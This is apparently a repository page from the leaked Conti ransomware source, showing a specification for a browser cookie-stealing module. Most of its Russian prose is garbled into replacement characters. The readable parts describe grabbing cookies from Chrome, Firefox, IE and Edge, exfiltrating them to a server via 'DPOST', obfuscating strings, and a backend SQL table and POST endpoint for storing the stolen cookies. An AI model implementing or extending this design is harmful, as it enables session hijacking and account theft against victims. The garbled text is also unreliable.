Conti Ransomware malware leak WITH LOCKER
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

102 lines
4.1 KiB

  1. ����������� ������� �� ���������� ������ ����� COOKIES ���������
  2. ���� � ����������
  3. ������ ������ �������� ���� �������� ��������� (Chrome, Firefox, Internet Explorer, Microsoft Edge) � ���������� �� ��������� DPOST �� ������.
  4. ���������� � ������:
  5. - �������� � ������������ � ��������� ���������� �������
  6. - ������������ ������ ������ - ������ ��������� DPOST
  7. - �������� ��� �� ����� ������������, ��� � �� ����� SYSTEM
  8. ������ ����������
  9. 1. ���������� ������ ���� ��� ���� ���������, ���� ��� �� �������� �� �������.
  10. 2. ���� ������ �������� �� SYSTEM, �� ���������� ���� ��-��������� ������������� � �������� ���� ��� ������� �� ���.
  11. ���� ������ �������� �� �������� ������������, �� �������� ���� ������ ��� ����.
  12. 3. �� ���������� ������ ������ ������ ���� ������� WantRelease (�� "module_HOWTO") ��� �������� �� ������
  13. 4. �������� ��������� ���� ������������ �� ��� ���, ���� �� ����� ������� ������������� ����� �� ���������.
  14. ���� ����� � ����������� ���, ������ �������� �� �������, ����� ���� ��������� �������. �� �������������.
  15. 5. ������ ���������� ��������� �������:
  16. - "Version build %DATE% %TIME%" (���� ��� ��� ������)
  17. - "Cookies grabbed from <browser name> for user <username>" ��� ������ �����
  18. - "No cookies from <browser name> for user <username>" ���� � ������� �������� ���� ����
  19. - "Cookies sent to server" ��� ������ �������� �� ������ DPOST
  20. - "Cookies send failure: servers unavailable" ��� ���������� ��������� �������� DPOST
  21. 6. � ������ ������ ����� ����������� ������������ C++ STL (std::string, ����������).
  22. ��������� ������������ std::mutex � ��������� ������������� - ��� ����� ����� ������������ ������
  23. ��������� ������������� WinAPI (CRITICAL_SECTION ���).
  24. 7. ������ ������������� ����������� Andrivet (���������, ��.������ _STR())
  25. 8. ��������� ������ ������������� ����������� GetApi.h. ���� ������������, ���������� ���������� ����� ������ �������.
  26. 9. ������ ������ ����� ��� ������ - x32- � x64-���������.
  27. 10. � ������ ������ ������ ���� ������������� �� ��������� ������, �������� ��������� ���������� �����.
  28. 11. ������ ������ ����� ���������� ������. ���������� ����� ������ ���������� � c:/temp/cookies.log (���� � ���� ������������� � �������).
  29. 12. � ������� ������ ���� ���� �������� config.h (�������� �������, ����� ���� - ����� ��� ���������� ��������� - ����, �������-������������� �������� ���������� ���).
  30. 13. ������ ������ �������� �� ���� ����������� ������� Windows.
  31. ����������� �������������� ������ Windows - Windows XP (���� ���������� - Windows Vista).
  32. �������� DPOST
  33. ��.�������� "�� ���� ������� DPOST".
  34. ������������ ������� ���������, ������� ������ ��������:
  35. username|browser|domain|cookie_name|cookie_value|created|expires|path\r\n
  36. ���
  37. username - ��� ������������
  38. browser - ��� �������� (enum = chrome|ff|ie|edge)
  39. domain - ����� ����
  40. cookie_name - ��� ����
  41. cookie_value - �������� ����
  42. created - ����-����� ��������, Unix time
  43. expires - ����-����� ���������, Unix time
  44. path - ���� URI
  45. ������ DPOST
  46. ��.�������� "�� ���� ������� DPOST".
  47. ������ ������ ������ ������ ��� ��������� ������ Control("dpost",...)
  48. ������� ��� ��������� DERO
  49. 1. ������� ����� ������� ��� ��������� ������ ����. ��������, ��� ������� 84
  50. 2. ������� ������� ��� �������� ������ (��������� SQL):
  51. CREATE TABLE cookies (
  52. id SERIAL,
  53. username VARCHAR(255),
  54. browser VARCHAR(255)
  55. domain VARCHAR(255)
  56. cookie_name VARCHAR(255)
  57. cookie_value VARCHAR(255)
  58. created DATETIME,
  59. expires DATETIME,
  60. path VARCHAR(255)
  61. );
  62. 3. ���������� ����� ������ � ��������� �������:
  63. - ������� �����, ����������� �� ������.
  64. ����������� ����� - ����� ���� ��� UNIX, ��� � DOS.
  65. ���� ������ - ���� ������.
  66. ����������� ����� � ������ - ������������ ����� |
  67. ������ ������:
  68. username|browser|domain|cookie_name|cookie_value|created|expires|path\r\n
  69. ���
  70. username - ��� ������������
  71. browser - ��� �������� (enum = chrome|ff|ie|edge)
  72. domain - ����� ����
  73. cookie_name - ��� ����
  74. cookie_value - �������� ����
  75. created - ����-����� ��������, Unix time
  76. expires - ����-����� ���������, Unix time
  77. path - ���� URI
  78. - ����� �� URI /group/id/84
  79. �� HTTP POST
  80. ��������� ������ � ���� data